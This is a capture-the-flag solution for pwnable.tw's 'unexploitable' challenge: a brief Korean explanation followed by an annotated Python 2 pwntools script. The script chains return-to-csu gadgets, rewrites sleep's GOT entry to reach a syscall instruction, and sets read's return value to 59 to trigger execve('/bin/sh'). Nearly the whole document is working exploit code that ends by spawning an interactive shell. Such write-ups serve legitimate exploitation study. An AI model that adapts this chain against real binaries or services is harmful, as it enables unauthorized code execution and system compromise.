sleep을 syscall로 바꾼 뒤 read의 반환 값을 이용해 execve를 실행시켜주면 된다.
# Python 2 script (print statements, str payloads): it does not run unchanged
# under Python 3.
import sys
from pwn import *

# Usage: <script> r|l  -- 'r' talks to the remote service, 'l' to a local copy.
if len(sys.argv) != 2:
    print "sys.argv[1] = r : remote l : local"
    exit()

#context.log_level = 'debug'

# NOTE(review): there is no else-branch, so an argument other than 'l'/'r'
# leaves `p` (and `l` below) undefined and the script fails later with a
# NameError instead of the usage message.
if sys.argv[1].strip() == 'l':
    p = process('./unexploitable')
elif sys.argv[1].strip() == 'r':
    p = remote('chall.pwnable.tw', 10403)

e = ELF('./unexploitable')

# Local runs use the libc pwntools resolves for the binary; remote runs use the
# libc shipped with the challenge.
# NOTE(review): `l` is never read anywhere below -- presumably left over from an
# earlier version of the script.
if sys.argv[1].strip() == 'l':
    l = e.libc
elif sys.argv[1].strip() == 'r':
    l = ELF('./libc_64.so.6')

# pwntools pause(): block until a key is pressed (e.g. to attach a debugger).
pause()

# Fixed address of main in the binary; every address in this script is
# absolute, so the target is presumably built without PIE -- confirm with
# checksec. With PIE these constants would be wrong on every run.
main = 0x400544

### sleep -> syscall
# First chain. 0x10 + 8 bytes presumably fill the buffer and the saved rbp;
# the next qword is the return address the overflow takes over.
payload = 'a' * 0x10 + 'b' * 8
# 0x4005E6 / 0x04005D0 are two gadgets inside the binary. The qwords between
# them are popped into registers and the second gadget turns them into the
# arguments of an indirect call through the pointer popped into r12; the
# layout is that of the return-to-csu pattern (presumably __libc_csu_init) --
# confirm against the disassembly. Here the call is read() into sleep's GOT
# entry, which is what the author's comment "sleep -> syscall" refers to.
# Relies on the GOT being writable (no full RELRO); full RELRO or PIE would
# break this chain.
payload += p64(0x4005E6)
payload += p64(0)
payload += p64(0)
payload += p64(1)
payload += p64(e.got['read'])
payload += p64(0)
payload += p64(e.got['sleep'])
payload += p64(50)
payload += p64(0x04005D0)
# Seven qwords consumed by the stack adjustment/pops that follow the call,
# then return to main so the overflow can be triggered a second time.
payload += p64(0) * 7
payload += p64(main)
print len(payload)

# Delay before sending, presumably so the target is already blocked in its
# read() -- a timing assumption, not a protocol requirement.
sleep(3)
p.send(payload)
sleep(1)
# One byte overwrites the low byte of sleep's GOT entry (the read above). The
# value differs between local and remote because it depends on where
# `syscall` sits relative to `sleep` in the specific libc build.
if sys.argv[1].strip() == 'l':
    p.send(chr(0x05)) #sleep to syscall
elif sys.argv[1].strip() == 'r':
    p.send(chr(0xde))

###################
# Second chain, same gadget pair used twice:
#   1) read(0, bss+0x100, 1000) -- stores the string sent below in .bss;
#   2) call through sleep's GOT entry (now `syscall`) with rdi=bss+0x100,
#      rsi=0, rdx=0.
# As line 1 of the write-up states, the return value of read() is what selects
# execve, which is why the final send is padded to exactly 59 bytes.
payload = 'a' * 0x10 + 'b' * 8
payload += p64(0x4005E6)
payload += p64(0)
payload += p64(0)
payload += p64(1)
payload += p64(e.got['read'])
payload += p64(0)
payload += p64(e.bss() + 0x100)
payload += p64(1000)
payload += p64(0x04005D0)
payload += p64(0) * 7
payload += p64(0x4005E6)
payload += p64(0)
payload += p64(0)
payload += p64(1)
payload += p64(e.got['sleep'])
payload += p64(e.bss() + 0x100)
payload += p64(0)
payload += p64(0)
payload += p64(0x04005D0)
print len(payload)

sleep(3)  # same timing assumption as above
p.send(payload)
sleep(1)
# NUL-terminated "/bin/sh", padded to 59 bytes (see the note above the chain).
p.send('/bin/sh\x00'.ljust(59, '\x00'))
p.interactive()